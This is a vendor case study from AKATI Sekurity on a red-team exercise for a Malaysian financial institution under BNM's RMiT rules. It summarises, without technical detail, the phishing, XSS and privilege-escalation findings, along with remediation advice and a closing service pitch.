Behind the Simulated Breach: A Case Study on Red Teaming for RMiT Compliance

For financial institutions operating under Bank Negara Malaysia’s (BNM) Risk Management in Technology (RMiT) framework, the stakes are higher than ever. Compliance is mandatory, but real security requires more than just policies and checklists. It requires proof.

That was the reason behind this Red Teaming and Adversarial Attack Simulation Exercise (AASE). The institution needed to know whether its defenses could withstand a determined attacker, not in an artificial test environment but under conditions as close to a real-world cyberattack as possible. AKATI Sekurity was brought in not just to identify weaknesses but to think and act like an adversary—to find a way in, move undetected, and assess how prepared the organization really was.

The Test: A Controlled, Simulated Attack

Unlike standard penetration testing, which focuses on detecting vulnerabilities, this Red Team engagement was about simulating a real attacker's behavior. The exercise mimicked the approach of an advanced threat actor, starting with reconnaissance, moving through exploitation, and attempting to escalate access—all while testing the organization's ability to detect, respond, and contain the threat.

The attack unfolded in phases. It began with intelligence gathering, where publicly available information was scraped from employee directories, social media platforms, and even past data breaches on the dark web. A list of employees and their roles was compiled, along with email addresses and potential login credentials. With that information in hand, the team moved to targeted social engineering attempts. Carefully crafted phishing emails were sent to select employees, disguised as internal company communications. Another approach involved creating a fake LinkedIn profile of a job recruiter to engage with employees from HR and IT. The goal was simple—get someone to click, respond, or open a file.

The results were mixed. Some employees engaged with the phishing attempts, clicking on links and entering credentials on fraudulent login pages. Others ignored the emails or flagged them as suspicious, indicating a baseline level of awareness. A few went further and executed the payload attached to a phishing email, unknowingly giving the Red Team access to their systems. The payload, once executed, logged keystrokes, took screenshots, and exfiltrated session data in real time. From an attack perspective, it was a success. From a security perspective, it was a wake-up call.

But the test didn’t stop at phishing. The Red Team searched for technical weaknesses in the institution’s external-facing applications. Web applications were scanned for vulnerabilities, and it didn’t take long to find them. A Reflected Cross-Site Scripting (XSS) vulnerability allowed malicious code to be injected into a legitimate company website, creating an opportunity for session hijacking. If exploited by a real attacker, this weakness could have granted access to user accounts without needing passwords.

Beyond external threats, the simulation explored privilege escalation within the network. The team tested compromised credentials, searching for weak internal controls that would allow lateral movement across systems. In some cases, user accounts were found to be reusing passwords across multiple platforms, an oversight that could allow an attacker to pivot from a low-level account to more sensitive areas of the network. The security monitoring tools caught some of these attempts, but not all of them.

What the Attack Revealed

The exercise confirmed what many organizations fear but don’t always test—there were gaps. Employees were falling for phishing attempts, proving that security awareness training alone wasn’t enough. Web applications had exploitable vulnerabilities, meaning an attacker could gain access through technical means if they weren’t stopped in time. More concerning was the discovery that not all security alerts triggered immediate action. While some attacks were blocked, others went unnoticed for longer than they should have.

There were strengths, too. Certain defenses worked as intended, particularly multi-factor authentication (MFA) on high-privilege accounts, which stopped some escalation attempts in their tracks. The endpoint security system successfully detected and blocked parts of the attack, preventing full compromise. But relying on security tools alone was risky. Attackers don’t follow rules, and neither did the Red Team. They re-engineered payloads, modified attack methods, and exploited human error—just as a real-world threat actor would.

The Road Ahead: Fixing the Gaps Before an Actual Attack

AKATI Sekurity didn’t just deliver a report; it provided a clear roadmap for improvement. The organization needed to tighten web application security, closing vulnerabilities that allowed XSS and clickjacking attacks. Employee training programs needed a stronger emphasis on recognizing social engineering tactics, not just generic cybersecurity awareness. Security monitoring tools had to be fine-tuned to detect more advanced attack techniques, particularly those involving session hijacking and privilege escalation attempts.

The institution also had to reconsider its third-party security oversight. Vendor agreements were found to be missing crucial security clauses, meaning external service providers weren’t being held to the same security standards. That was an unnecessary risk, one that could be exploited by attackers targeting the weakest link in the supply chain.

Ultimately, the exercise reinforced a simple but critical truth: compliance isn’t the same as security. Meeting regulatory requirements is necessary, but real resilience comes from continuous testing, adaptation, and a proactive approach to cybersecurity.

Final Thoughts: A Test That Could Prevent the Real Thing

For many organizations, cybersecurity remains an abstract concept until something goes wrong. A Red Teaming exercise like this one eliminates that uncertainty. It forces companies to confront their weaknesses before an actual attacker does. It’s not just about uncovering vulnerabilities—it’s about proving, without question, whether security defenses can hold up under pressure.

This financial institution now has that proof. They know where they stand, what worked, and what didn’t. More importantly, they have a plan to fix the gaps, strengthen their defenses, and ensure that the next attack—whether simulated or real—won’t succeed.

AKATI Sekurity specializes in real-world adversarial simulations, stress-testing security defenses, and helping organizations move beyond compliance to true cyber resilience. If you want to know how your defenses hold up against modern attackers, we’re ready to put them to the test.